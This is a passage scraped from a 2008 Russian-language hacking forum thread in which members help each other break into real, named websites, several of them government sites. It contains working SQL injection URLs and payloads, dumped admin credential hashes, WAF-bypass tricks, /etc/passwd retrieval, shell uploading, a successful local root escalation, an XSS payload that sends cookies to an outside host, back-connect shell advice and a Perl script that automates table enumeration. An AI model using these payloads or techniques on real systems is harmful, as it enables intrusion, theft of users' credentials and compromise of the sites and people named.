Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: www.energia.ee
Content-Length: 282
Connection: Close
Pragma: no-cache
Acunetix-Product: WVS/5.5 (Acunetix Web Vulnerability Scanner - NORMAL)
Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED
Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm
html_enabled=1&subject=Elektritarne%20pakkumine%20L%C3%A4tis%20v% C3%B5i%20Leedus&locationData=979%3Att_content%3A3514&Ettev%C3%B5te="+or+1%3D1+--+&Kontaktisik=111-222-1933email@address.tst&Telefon=111-222-1933email@address.tst&Epost=111-222-1933email@address.tst&formtype_mail=Saada
Орёт,что скуля. Пробывал постами меняя параметры заставить отреагировать серв,но ему поф даже на 1+and+0=0 и 1+and+1=1
Менял параметры, как только мог. Есть тут инжект или нету?
но ему поф даже на 1+and+0=0 и 1+and+1=1
Что ты хотел этим сказать? 0_о
Что ты хотел этим сказать? 0_о
моя хотело сказать,что ему абсолютно ПОФ,тобишь он возвращает одинаковый результат,обрезает чели,потому что при смени ид меняется только страница )),а запросы он как будто ваще не видит: )
-=megahertz=-
30.04.2008, 18:45
по моему правильнее было так сделать =1+1 или =2-1 если страница та же то инжекта нет...
при подключение через mstsc.exe пишет Эудалённые подключения запрещены"
как запустить? есть шелл на удалённой системе к которой произвожу коннэкт.
права system
Велемир, а ты не думал, что 0 всегда равен нулю, как и 1 всегда будет равна самой себе?)) ты бы попробовал 1=2 и делал выводы. Ещё попробуй к id -1 подставлять и т.п.
http://www.rosprom.gov.ru/oorg.php?id=-13+or+1=concat_ws(0x2,user(),database(),version())--
Я так понял, что с этого ничего нельзя поиметь?
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?
К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?
Спасибо всем ответившим =)
.acme
при обращении к скрипту http://www.rosprom.gov.ru/oorg.php
в куки прописывай id=-999 union select 1,2,3,4,5/*
всем привет
частенько сталкиваюсь с извлечением большого количество данных из баз данных.
можно ли как-нибудь начать извлекать данные начиная к примеру с 20.000'ой записи?
К примеру:
Имеем дейтинг-сайт с логинами/пассами/мылами на 20к пользователей. В месяц региться ещё порядка 1к. Можно ли определённым запросом вывести на эран инфу начиная с 20.000? Чтобы не качать заново всю информацию полностью?
Спасибо всем ответившим =)
Пользуйся лимитом (LIMIT 20000,100) к примеру
Indio какая СУБД интересует?
MSSQL: select TOP n column from table where column>'чето'
MYSQL: select column from table limit 20000,10
SYBASE: select TOP n START AT 20000 column from table
PostgreSQL: select column from table LIMIT 10 OFFSET 20000
Со скулей походу ниче не вышло,аблом =_=
Вот второй день уже маюсь,дошёл вот :
http://robinzonada.ru/news/index.asp?id=1+or+1=(select+top+1+table_name+from+ information_schema.tables+where+table_name+not+in+ (0x276C6F67696E27,0x27647470726F7065727469657327))--
Почему дальше не идёт,не ужели всего две таблицы ?))
http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+((select+all+top+1+table_name+from+information _schema.tables)))--
http://robinzonada.ru/news/index.asp?id=1+or+1=(select+all+top+1+table_name+f rom+information_schema.tables+where+table_name+not +in+((select+all+top+2+table_name+from+information _schema.tables)))--
меняй число после top во втором подзапросе (который внутри where+table_name+not+in)
Пасип те большое))).И откуда ты только эти подзапросы откопал:Р
Constantine
01.05.2008, 00:31
из манов, которые тебе давно пора начать читать
Я прочитал почти всё что только можно прочитать: (и маны читал по сто раз
На100ящий
02.05.2008, 14:36
Подскажите кто нибудь:
Система UNIX.
В httpd.conf прописано:
<VirtualHost *>
ServerAdmin webmaster@site.com
DocumentRoot /www/htdocs/rail
ServerName www.site.com
# ServerAlias 10.7.103.250
ServerAlias 10.7.100.4
ErrorLog /var/log/apache/railway.log
CustomLog /var/log/apache/railway.log common
</VirtualHost>
Дальше нужно записать файл в директорию /www/htdocs/rail:
www.site.com/index=4&number=1'+union+select+1,2,3,convert(текст+us ing+c p1251)+from+mysql.user+into+outfile+"\\www\\htdocs\\rail\\1.txt"/*
Вроде записалось, проверяем:
www.site.com/1.txt и нифига не получилось... Кто скажет почему???
нашел на сатйте бажный скрипт даунлоада фалов
скачал /etc/passwd все прошло норм
поробовал /etc/shadow
а он мне выдает вот эту шянягу http://slil.ru/25750274 что это может быть???
На100ящий, скорее всего, просто нет прав на запись в корень. Ищи папки с правами на запись.
Vid0k, не качал что там по ссылке, но предполагаю что тоже не хватает прав. На /etc/shadow права имеет только root, если систему ставили без кардинальных изменений :)
что можно еще попробовать нарыть
уже скачал error_log
httpd.conf
httpd-autoindex.conf
httpd-info.conf
httpd-mpm.conf
httpd-ssl.conf
httpd-vhosts.conf
ток ничо дельного не нашел ток юзерские диры
пытался скачать конфиг phpmyadmin но не выходит пишет мол ошибка
сам весь сайт на хтмл + пара скриптов на пхп
версия phpmyadmin 2.11.4
оО пездец полюбому черная магия, юзай читы
ты не понимаешь ничего.
предупреждения не воздействуют.
Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.
Vid0k, поищи конфиги, мож там форум какой стоит или гест бук.
уже нашел конфиги для db логин и пасс подошли к phpmyadmin
права там урезаны пытался залить шелл через вывод таблицы в файл не дали)
в админке сайта нету даже где залить файл попробую
отредактировать шабон index может пропишу простейший шел а там уже посмотрю
Подскажите, что можно сделать в случае если, база данных 4.1.22-standard, установлен форум, но стандартный префикс в таблицах по идее изменен. Каким образом тогда можно узнать названия этого самого префикса, чтобы получить пароль админа?
----------------------------------
брут не предлогать-помоему это не реально
Лигендо Онтечада
03.05.2008, 14:32
Вызови какую-нить ошибку mysql, чтоб она выплюнула название таблицы
vampir3a
05.05.2008, 10:18
Всем привет , сканернул сайт и нашёл крит уязвимость
Unfiltered Header Injection in Apache
This version of Apache is vulnerable to HTML injection (including malicious Javascript code) through "Expect" header. Until not it was not classed as security vulnerability as an attacker has no way to influence the Expect header a victim will send to a target site. However, according to Amit Klein's paper: "Forging HTTP request headers with Flash" there is a working cross site scripting (XSS) attack against Apache 1.3.34, 2.0.57 and 2.2.1 (as long as the client browser is IE or Firefox, and it supports Flash 6/7+).
Нашёл описание тут http://www.securityfocus.com/archive/1/433280
но так и не понял как ей пользоватся так же скрипт показывает <script>alert(39582,41865125)</script>
: ( подскажите пожалуйста что и как ... ?
Всё прально, вместо цифр ставь текст : alert(/gagaga/) или alert(135)
Про XSS тут дофига статей, пофтыкай побольше.Если те нужен перевод, пиши на 292-514-125 : )
Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.
Jokester
05.05.2008, 17:42
Ой мля,ступил ппц.Это атака через хттр заголовок Expect.Для этого надо создать объект и послать,лично не пробывал:Р.Прост этот торч надеется на то, что через ие и файрфокс так сделать нельзя(и правильно делает),но через объекты мона.
Послушай, юноша, за каким хреном писать такой бред?
vampir3a
Вот немного об уязвимости на русском, но не особо обольщайся, сканер нашёл это не значит ,что получится использовать
_http://www.securitylab.ru/analytics/271169.php
+r0ot?r+
05.05.2008, 19:48
1.Есть форум, Powered by SMF 1.1.x,как узнать х?
2.Надеясь на удачу(что версия <=1.1.4), пробую приаттачить файл со следующим названием:
abc<img src= .width=1 height=1 onerror=javascriptnew Image().src='http//s.netsec.ru/arm.gif'+document.cookie>.txt
Но выдаётся ошибка:
default.htm.
Вы не можете отправить этот файл. Доступны только следующие типы файлов doc,gif,jpg,mpg,pdf,png,txt,zip.
Подскажите это уязвимость или нет?
http://www.intone.ru/get2.php?partner=269&id=89596/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*
помоему да, т.к при таком запросе не происходит редирект на главную страницу. Но ни одно из полей не выводится :(
---------------------------------------
Извиняюсь сплоховал, менял значения в partner :)
Спасибо ZAMUT!!!
samarin, просто замени на несуществующее значение id, -1 к примеру. Вывод есть.
или
http://www.intone.ru/get2.php?partner=269&id=89596/**/and/**/1=0/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29/*
Вывод то есть, а каким образом вывести что нибудь интересное? ведь доступа к information_schema нету, и намека, хоть на какое-то название таблиц тоже.
Довольно интересный случай (я только учусь и такого еще не встречал).
groundhog
06.05.2008, 19:26
Там походу фильтры Get-post переменных стоят, ибо как что нормальное в инъекцию прописываешь аля Information_schema.tables, то выдаёт такую байду: "Ваш запрос отвергнут по причине его возможной небезопасности". Хотя классический Union+select даёт вывод в страницу...
все верно, фильтрация идет при Get/post запросах.
попробуй закодировать в %20%40%xx у меня раз был случай когда так прокатывало, а чистый запрос отвергало.
Чойто за 20 40 :РР. Я где-то читал,что мона попробывать передать гет переменные постом и наоборот:Р. Вродь катит.. )А ф топку такие замуты )
Велемир http://ha.ckers.org/xss.html внизу страницы можно перекодировать :)
Чойто за 20 40 :РР.
url encoding
Всем конечно спасибо за то что откликнулись, но url encoding не катит.
сообщение от ZAMUT
фильтруется from
У меня не получилось обойти-может что то посоветуешь?
-----------------------------------------------------------
Возможно ли вытащить что-то интересное? если не возможно, так и скажите, чтобы я голову зря не ламал :)
фильтруется from
Там не from фильтруется, а последовательность
union select from.
Всем конечно спасибо за то что откликнулись, но url encoding не катит.
У меня не получилось обойти-может что то посоветуешь?
-----------------------------------------------------------
Возможно ли вытащить что-то интересное? если не возможно, так и скажите, чтобы я голову зря не ламал :)
На первый взгляд ничего интересного.
Таблицы clocks,blogtext, blogsfree,freemp3,freepics
Есть таблица jgamesru_int.partners с полями
name,login,pass
+r0ot?r+
07.05.2008, 14:03
Warning: mysql_data_seek(): supplied argument is not a valid MySQL result resource in {url} on line 60*
MySQL плюется данной ошибкой,как дальше ломать?При подборе кол-ва полей такого же рода ошибки.
ссылку то кинешь или тебе на руке погадать?
сообщение от goror
На первый взгляд ничего интересного.
Таблицы clocks,blogtext, blogsfree,freemp3,freepics
Есть таблица jgamesru_int.partners с полями
name,login,pass
Мне в этом примере интересен сам процесс. Как обошел?
Спс что ответили Вельке :Р
У мну вопрос по SQL (сразу в эту (http://forum.antichat.ru/thread19844.html) тему не пинать.
Я нашел "xspider"ом дыру вот такого типа http://www.site.ru/forum/index.php?showforum=2&prune_day=100&sort_by=Z-A&sort_key=last_post&category1=1'&st=25
Выдает
mySQL query error: SELECT COUNT(tid) as max FROM ibf_topics WHERE forum_id=2 and approved=1 and (pinned=1 or last_post > 0) AND category1=1'
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
mySQL error code:
Date: Wednesday 07th of May 2008 05:52:48 PM
Че с этим добром делать, мне не понятно =((
Просьба помочь...
Zergius, прочитать пару статей по SQL-инъекциям. Их тут очень много, можно даже поиск не юзать, просто зайти в раздел "Статьи". Там всё подробно расписано.
з.ы. https://forum.antichat.ru/thread19605.html вот :)
з.з.ы. Если тебе интересно зачем это вообще надо - ну много вариантов: шелл залить, инфу вытащить (базу мыл, пассы и т.п.), заддосить..
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось
Просто я ни в одной статье такого не вижу, а насчет инфы-это извесный сайт по фотошопу, как пойму как вытащить инфу(учиться как то надо), так админу думаю расскажу...
Млин, все равно не догоняю =(((
hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,c oncat_ws(0x2F,version(),database(),user()),7,8,9,1 0,11,12,13,14/*
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost
Доступа к information_schema нет. К форуму (phpbb) - тоже. Можешь попробовать подбирать названия таблиц вручную. Типа там users, members и тд.
Помогите со sql иньекцией сам ковырял не получилось http://hhunt.ru/comments.php?news_id=9999+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,14/*
Читал статью тоже так же ниче не получилось
f5
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
4.1.22-log/hhuntru4_apeha/hhuntru4_user2@localhost да это я сам знаю
А как есть какой нибуть автоподбор или чтото в этом роде просто подбирать это долго и мучительно((
Есть проги типа SQL Injection Tool от SQLHACK. Там если я не ошибаюсь можно организовать автоподбор. А вообще где-то тут была тема часто юзаемых имен для таблиц и колумнов. Поищи и проверь если хочешь.
Zergius, дай ссылку на сайт. На пальцах никто ничего не объяснит.
ООООООО МДЯЯЯЯ ВОТЬ ЭТО УЖЕ РЕАЛЬНЫЙ ППЦ)))))))) (p.s. наврятли чтото получиться имхо хотя не кто не знает что произойдет)
Сор за капс
Sharingan
07.05.2008, 23:32
Вот такое дело, был сайт на нем висел шелл долго, были права на редактирование индекса, потом админ убрал права на запись, какие есть возможные способы поднять права?
Zergius не волнуйся у мя такая же трабла со школьным сайтом((
какие есть возможные способы поднять права?
Можно узнать пасс админа и права поднимутся :)
Заюзать сплойтенг, которые сделает тебя рутом =)
Sharingan
07.05.2008, 23:47
мне нужно именно знать какие есть сплойты, какая инфа нужна для того что бы проверить реально ли воспользоватся данным сплойтом, просто хочу что бы все было быстро и оперативно.
Sharingan, знаешь какая ОС? :)
Можно поискать под конкретную версию + сплоит под сервисы, которые крутятся на машине
Sharingan
07.05.2008, 23:59
FreeBSD 6.2-RELEASE-p5
Server: Apache
safe_mode: OFF PHP version: 4.4.7 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF
если на таком шелл стоит реально ли права поднять?
Сейф мода нет...дас ист гут :)
Вот, поищи тут:
http://milw0rm.org/search.php
Лучше в поиск вбивать названия демонов :)
Кто нибудь подскажет как обойти фильтр последовательности union select from?
----------------------------------
https://forum.antichat.ru/thread56409-sweb.html читал, но вопрос остался
vampir3a
08.05.2008, 01:11
Hi All
Такой вопрос зашёл в админку Coppermine Photo Gallery через куку админа такой вопрос как лучше залить шел ? заранее спасибо !!!
http://forum.antichat.ru/threadnav59410-1-10-Coppermine%2BPhoto%2BGallery.html
Sharingan
08.05.2008, 23:56
касательно сообщение #1921 так и не нашел сплойта, может кто что посоветует ?
кароче я все подставил как мне человнк подсказал и получилось)) вот что получилось http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,usr_emai l,usr_psw,15,16,usr_id,18+from+users+limit+1,1/*
Собственно я сразу побежал в админку http://r-est.biz/admin вроде как не получилось войти (катогория админки не та вроде как) кароче я решил ломануть ихний phpbb форум. подставил все вроде правильно но чето не высвечиваеться пароли((
http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,username ,user_password,15,16,user_id,18+from+phpbb_users+l imit+1,1/*
вот колонки phpbb
http://r-est.biz/?r=nj&n=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,column_name,18+from+information_schema.colu mns+where+table_name=0x70687062625f7573657273+limi t+1,100/*
Подскажите если не трудно
diznt
не трудно..)
http://r-est.biz/?r=nj&n=-http://r-est.biz/?r=nj&n=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,table_schema+from+Information_schema.tables +where+table_name=%200x70687062625f7573657273+limi t+0,1/*
http://r-est.biz/?r=nj&n=-1+union+select+null,null,null,null,null,null,null, null,null,null,null,null,concat(user_id,0x3a,usern ame,0x3a,user_password),null,null,null,null,null+f rom+restbi_bb.phpbb_users/*
admin;e816c860394f9fb51eed8d902a569e5d
точно там же concat)) блогадарю
касательно сообщение #1921 так и не нашел сплойта, может кто что посоветует ?
Порутать данную тачку нечем. Паблик эксплойтов нет, приватных не видел
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,concat(username,0x3a,user_passwor d,0x3a,user_icq),3,4,5,6,7,8,9+from+phpbb_users+li mit+1,1/*
юзеры форума. Если на сайте есть форум, значит можно попытать залезть а таблицу его юзеров. Для пхпбб эта таблица как правило имеет название phpbb_users.
А вобще используй запрос типа такого http://www.site.ru/index.php?id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.columns+where+column_name='passwor d'/*
Ты получаешь все таблицы, где есть колумн password. Можно вместо ='password' использовать функцию char()
http://www.vturs.ru/index.php?mod=view&id=-1+union+select+1,table_name,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+1,2/*
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
Напиши скрипт(например на пхп)который будит будит подставлять значения лимита за тебя и собирать результат в тхт (где-то видел такой,помоему на грабберз.ком )
ЗЫ:Первые 17 значений - системные таблы!
2 diznt ...ves' kaif lomae6.... uznavat' tables i columns v udovol'stvie.ili ti postavil na promishlennii ma6tab vzlomi 4erez sql.Kud anarod katitsea :))) nikakoi romantiki uje...vse na avtomatiku prutsea..skoro v detskom sadike deti budut progoi ustanovlenoi v tetris serveri lomat' :))) uda4i vam vsem v va6em nelegkom trude....
знаю что нет но всётаки решил спрсить.... в mssql иньекции никак не выдернуить данные из другой бд?
aka PSIH
11.05.2008, 09:09
xcedz
откуда в mssql - load_file() взялся?
в mssql иньекции никак не выдернуить данные из другой бд?
Что ты подразумеваешь под другой БД?
select ColumnName from DBname.TableName ???
имена бд на сервере можно так посматреть:
Select schema_name from information_schema.schemata
если ты конечно про это...
xcedz
откуда в mssql - load_file() взялся?
:D блин не внимательно посмотрел.
==
а можно так:
SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, ...
http://msdn.microsoft.com/en-us/library/bb545450.aspx
тогда для текущей базы:
----------------------------------------
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' --
h==p://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
Нет ... я знаю имена всех БД
например сейчас есть подключение с БД test1 а на сервре через
SELECT DB_NAME(N) я просмотрел все БД например test1,test2,test3
можно ли выташить данные из test2?
aka PSIH
11.05.2008, 15:30
если прав хватит
>select ColumnName from test2.TableName
Как быстрее выявить таблицы? а то меняя значения лимита это занудно и долго
#!/usr/bin/perl
use LWP::UserAgent;
$ua = LWP::UserAgent->new;
$x=0;
$y = $ARGV[0];
open(TT,">","mda.txt") or die "$!";
while ($x<=$y)
{
my $omfg = $ua->get("[СКУЛЬ ТУТ")->content;
$omfg =~m%###(.*?)###%i;
my $table = $1;
print TT $x,":",$table, "\n";
$x++;
}
close TT;
Сначало узнаёшь общее кол-во таблиц/колонок, count(table_name) from information_shema.tables/columns
Дальше в скрипт вписываешь скуль в таком виде:
http://site.ru/index.php?id=-1+union+select+1,2,3,concat(0x232323,table_name,0x 232323),4,5+from+information_schema.tables+limit+$ x,1--
Запуск:
perl script.pl 23
где 23 - общее кол-во таблиц/колонок. Скрипт впринципе можно переделать хоть подо что.
Многотредовую версию с поддержкой проксей не выкладываю, ибо нех:\
еще разок
http://forum.antichat.ru/thread60802.html
Растолкуйте мне непонятливому кто нибудь как работает этот эксплоит. А то я что-то в нем запутался :)
http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F351739.php
а точнее какую ссылку он создает. Хотелось бы потренироваться вручную проводить такие иньекты. Да и на будующее пригодиться :)
пробовал на localhost-e но получил в отчетах бред
a:4:{s:13:"link_category";s:1:"1";s:9:"link_name";s:1:"1";s:8:"link_url";s:1:"1";s:16:"link_description";s:1:"1";}
aka PSIH
11.05.2008, 18:40
там же все написано
Host: 127.0.0.1
POST PHP-Fusion/submit.php?stype=l
link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1
я это видел. Но когда я пытался составить запрос вручную, меня кидало на главную стр. Приведи please рабочую ссылку, а я от нее буду отталкиваться дальше
samarin, это POST запрос :) submit.php запускается когда ты хочешь что-либо добавить на сайт (ссылку, картинку, новость, статью - это как правило доступно только зарегистрированным пользователям сайта). Допустим это ссылка, тогда ты видишь перед собой форму добавления новой ссылки, куда надо вписать категорию ссылки (link_category), имя (link_name), урл (link_url) и описание (link_description - здесь и есть скуля), после этого ты нажимаешь "Отправить ссылку" и браузер отправляет POST запрос, например на сайте 1С 1cnastole.info он будет выглядеть к примеру так:
POST /submit.php?stype=l HTTP/1.1
Host: 1cnastole.info
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://1cnastole.info/submit.php?stype=l
Cookie: fusion_visited=yes; fusion_user=211.b111406bc3sdfgs1cf532bfcc68d8d; fusion_lastvisit=1123123
Content-Type: application/x-www-form-urlencoded
Content-Length: 216
link_category=1%D1%3A%D4%F0%E0%ED%F7%E0%E9%E7%E8&link_name=%CD%E5%F2%EE&link_url=http%3A%2F%2Fqwer.ru&link_description=%F3%E4%E0%EB%E8%F2%E5+%EF%EB%E8%E 7+%29&submit_link=%CE%F2%EF%F0%E0%E2%E8%F2%FC+%F1%F1%FB% EB%EA%F3
Результат увидишь когда ссылка добавится на сайт. (в эксплоите написано где именно).
Существуют ли какие-то плагины для создания(редактирования) пост запросов в опере?
-------------------------------------
и подкиньте полезные ссылки где можно почитать по работе с пост запросами
Связка InetCrack(для отправления запросов) + Naviscope(для отлова отправленных на любой сервер запросов). Но сначала внимательно прочитай про протокол HTTP.
delay(0)
12.05.2008, 01:35
Microsoft JET Database Engine error '80004005'
Syntax error in FROM clause.
http://www.../links/default.asp?id=1+union+select+1+from+user
В чем дело?
geezer.code
12.05.2008, 13:22
http://www.*****.ru/shop/pollbooth.php?op=results&pollid=-6+union+select+9999/*
Есть такая инъекция...выводит 9999....но когда я заменяю 9999 допустим на version() и т.д.
Сразу выдает ошибку и ничего не выводит...из за чего это может быть и как сделать что б нормально выводило?
скорее всего штото там с коллейтами или типа того
обходится aes_decrypt(aes_encrypt(vesion(),0xaa),0xaa)
truelamer
12.05.2008, 17:22
Скажите мне пожалуйста:
1) когда я делаю иньекцию то мои ошибочные запросы пишутся в лог???
2) что на свой сайт можно поставить чтоб тоже палить попытки взлома?
3) правда что Post запросы не палятся?
4) чем их посылать? и в каком виде будет приходить ответ?
to truelamer
Всё имхо:
1)да.
2) ---
3) да.
4) ---
truelamer,
2) Смотря на что ставить
4) InetCrack или любая подобная прога (скачать можно на old.antichat.ru в разделе прог, что в правой колонке)
blackybr
12.05.2008, 19:51
3) правда что Post запросы не палятся?
смотря какой сервак. если на апаче, то есть по меньшей мере 1 модуль который умеет палить пост запросы mod_security
если у нас iis >6 (6 или 7) то он по дэфолту палит и гет и пост запросы.
на nginx не видел ничего такого. _вроде_ не палит
сорь не знал куда постит свой нубский вопрос... видел видео где через шел рст паренёк сделал бакконект и у него коммандная строка оказалась в putty (Знаю тупо обьеснил) так вот как и куда делать бекконект чтоб потом управлять командной строкой через putty?
Бэкконект - это когда сервер коннектится к тебе, а не ты к серву. Для этого нужен nc, для открытия и прослушки порта.
А Путти юзается чаще всего при использовании биндшеллов...
Вотъ :)
P.S. для бэкконекта нужен внешний IP :)
geezer.code
13.05.2008, 21:37
для бэкконекта нужен стат. IP
не вводите в заблуждение... не статический , а ВНЕШНИЙ.
иногда зовется выделенным.
не за NATом,
то есть его должно быть видно из инета ))
Jokester
13.05.2008, 22:30
Биндшелл - это когда сервер коннектится к тебя, а не ты к серву
Помоему Вы решили его окончательно запутать :D
Биндшелл-это (грубо) открытый порт на взломаной тачке
Чтобы к нему подрубиться и не спалиться используют putty(он работает с прокси)
Бэкконект это когда взломаная машина подключается к тебе.Используют в основном для обхода фаэров если входящие подключения режутся
Помоему Вы решили его окончательно запутать :D
Биндшелл-это (грубо) открытый порт на взломаной тачке
Чтобы к нему подрубиться и не спалиться используют putty(он работает с прокси)
Бэкконект это когда взломаная машина подключается к тебе.Используют в основном для обхода фаэров если входящие подключения режутся
А я вроде все так и написал:
Бэкконект это когда взломаная машина подключается к тебе.
разве это не то же самое, что я написал:
Биндшелл - это когда сервер коннектится к тебе, а не ты к серву.
?
Под сервом я подразумевал жертву :)
Jokester
13.05.2008, 22:55
2criz нет
Вообще биндшелл это программа которая открывает порт на сервере(жертве)
Она никуда не коннектится просто держит открытый порт(можешь назвать его бекдор), подключаться к порту будешь сам, а что-бы не со своей машины ,через прокси, используют putty
аааа...блин. Все, нашел ошибку. Я не биндшелл хотел написать, а бэкконект :)
Сорри всем :)
З.Ы. надо проспаться
залил и выполнил сплоит хотя скомплился он с ошибками=) но чтото произошло до запуска сплоита группы были
uid=48(apache) gid=48(apache) groups=48(apache),2523(psaserv)
после
uid=0(root) gid=48(apache) groups=48(apache),2523(psaserv)
видимо добавился новый юзер? рут? тогда как его использовать?
сплоит http://milw0rm.com/exploits/4460
гы сорри понел эт я типо рут)
видимо добавился новый юзер? рут?
Не, сплоитом ты повысил права... Тока вот, почему гид не рутовый... Должен был запуститься sh из под рута...
Coder007
15.05.2008, 16:45
Zdrastvyite!Y menia vopros k specialistam po XSS,
http://www.fundacion.telefonica.com/forum/forum_intro.html
est' zdes' XSS ili net?Putaus' poniat' SQL-injection i XSS,
s SQL vrode nichego-ponimau,a XSS ny ochen' tugo:(
Chital stat'ii no princip poniat' ne mogu,obesnite pogaluysta,estesvenno esli est' zgelanie;)
Lesnoy_chelovek
15.05.2008, 16:51
В поле поиска есть пассивная Xss.
Coder007
15.05.2008, 17:00
Thanks!
http://www.titan2.ru/press/?page=1&id=-107' это скуль..
http://www.titan2.ru/press/?page=1&id=-107+order+by+1/* а вот это ?
извините если такой вопрос уже был
Gorev, http://dev.mysql.com/doc/
Что такое SQL-injection? Это отправка базе данных SQL команды на выполнение через web скрипт, расположенный на доступной рядовому пользователю веб-странице.
http://www.citforum.ru/howto/smart-questions-ru.shtml
lastsmile
16.05.2008, 09:09
http://www.titan2.ru/press/?page=1&id=-107' это скуль..
http://www.titan2.ru/press/?page=1&id=-107+order+by+1/* а вот это ?
извините если такой вопрос уже был
я попробовал язык поменять и айди параметр в конце сделать, кароче вот:
http://www.titan2.ru/press/?page=1&lang=en&id=
а вот что-то дальше никак не получается((
lastsmile
http://www.titan2.ru/press/?menu=199&page=1&id=107-1+union+select+1111111,2222222,33333333,44444444,5 555555,666666
6 колонок, вывода нет, фильтр /*
Помогите раскрутить
Них не выходит
Вищий Господарський Суд України
http://arbitr.gov.ua/news.php?lang=ukr&sub_section=1&news_id=129'
столкнулся с такой проблемой
admin:43e9a4ab75570f5b
Полуночный Хэкер
16.05.2008, 12:46
Gorev, у вас пробелмы? www.narko-net.ru
столкнулся с такой проблемой
admin:43e9a4ab75570f5b
admin:admin
Чё тут за проблема-то?
admin:admin
Чё тут за проблема-то?
43e9a4ab75570f5b eto je ne MD5?
P.S. ne podhodit pass admin admin
admin:admin
Чё тут за проблема-то?
43e9a4ab75570f5b eto je ne MD5?
P.S. ne podhodit pass admin admin
Это Mysql !
Пасс от баззыданных скорее всего а не от админки!
Jokester
16.05.2008, 13:10
http://www.titan2.ru/press/?page=1&id=-107' это скуль..
http://www.titan2.ru/press/?page=1&id=-107+order+by+1/* а вот это ?
извините если такой вопрос уже был
http://www.titan2.ru/press/?menu=199&page=1&id=107-1+union+select+1111111,2222222,33333333,44444444,5 555555,666666
6 колонок, вывода нет, фильтр /*
Помоему 3 ветка, и union'а соответственно нет.Т е подзапросы:
_http://www.titan2.ru/press/?page=1&id=106+and+substring(version(),1,1)=3
_http://www.titan2.ru/press/?menu=199&page=1&id=107+and+substring(version(),1,1)=3
На100ящий
16.05.2008, 14:24
Люди, а есть у кого пхпкод подбора столбцов и колонок в Mysql????? Выложите плз...
Basurman
16.05.2008, 14:50
На100ящий
В избранном прога от SQLHACK
https://forum.antichat.ru/thread24918.html
Gorev
http://www.titan2.ru
version() - 3.23.57
user() - titan@localhost
Ловить тебе там имхо нечего :)
Почему нечего? Угадывать и ещё раз угадывать:Р.
nu eto esli v printzip postavit' poimet' site..
На100ящий
16.05.2008, 17:12
Basurman,
Она правильно не определяет, нужен простой код пхп...сам писал и не получилось что то.... мож кто подскажет где ошибка???
<?
@set_time_limit(0);
$strverno=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.users+limit+1,1/*");
preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$strverno,$m);
foreach($m[2] as $s){
}
$fd = fopen("kol.txt", "r");
while(!feof($fd)) {
$ma=trim(fgets($fd));
